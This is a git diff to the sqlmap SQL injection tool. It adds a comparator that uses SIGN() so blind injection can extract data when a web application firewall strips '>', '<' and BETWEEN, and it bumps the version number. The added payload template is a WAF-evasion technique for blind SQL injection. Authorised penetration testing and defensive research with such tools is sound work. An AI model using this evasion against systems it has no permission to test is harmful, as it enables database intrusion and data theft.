diff --git a/extra/esperanto/discovery.py b/extra/esperanto/discovery.py index 9b5a24b9e..cf4c9b5ae 100644 --- a/extra/esperanto/discovery.py +++ b/extra/esperanto/discovery.py @@ -429,6 +429,11 @@ class _Discovery(object): elif self._ask("2 BETWEEN 2 AND 3") and not self._ask("5 BETWEEN 2 AND 3"): self._comparator = "between" self.dialect.notes.append("'>' unusable; bisecting via BETWEEN") + elif self._ask("SIGN(2-1)=1") and not self._ask("SIGN(2-3)=1") and not self._ask("SIGN(2-2)=1"): + # ordered, log2-efficient, yet needs NO comparison operator (only SIGN(), '-', '=') - + # survives a WAF stripping '>' AND '<' AND BETWEEN, without dropping to slow membership + self._comparator = "sign" + self.dialect.notes.append("'>'/BETWEEN unusable; bisecting via SIGN() (no comparison operator)") else: self._comparator = "membership" self.dialect.notes.append("no ordered comparator; using order-free IN() subset bisection") diff --git a/extra/esperanto/extraction.py b/extra/esperanto/extraction.py index e3b01656b..8c72952cd 100644 --- a/extra/esperanto/extraction.py +++ b/extra/esperanto/extraction.py @@ -133,6 +133,8 @@ class _Extraction(object): # BETWEEN expresses the same range test without the '>'/'<' a WAF may strip. if self._comparator == "between": return self._ask("%s BETWEEN %d AND %d" % (expr, n + 1, high)) + if self._comparator == "sign": + return self._ask("SIGN((%s)-(%d))=1" % (expr, n)) return self._ask("%s>%d" % (expr, n)) def _numDefined(self, expr): diff --git a/lib/core/settings.py b/lib/core/settings.py index 0601a6164..e03187eb7 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from lib.core.enums import OS from thirdparty import six # sqlmap version (...) -VERSION = "1.10.7.169" +VERSION = "1.10.7.170" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)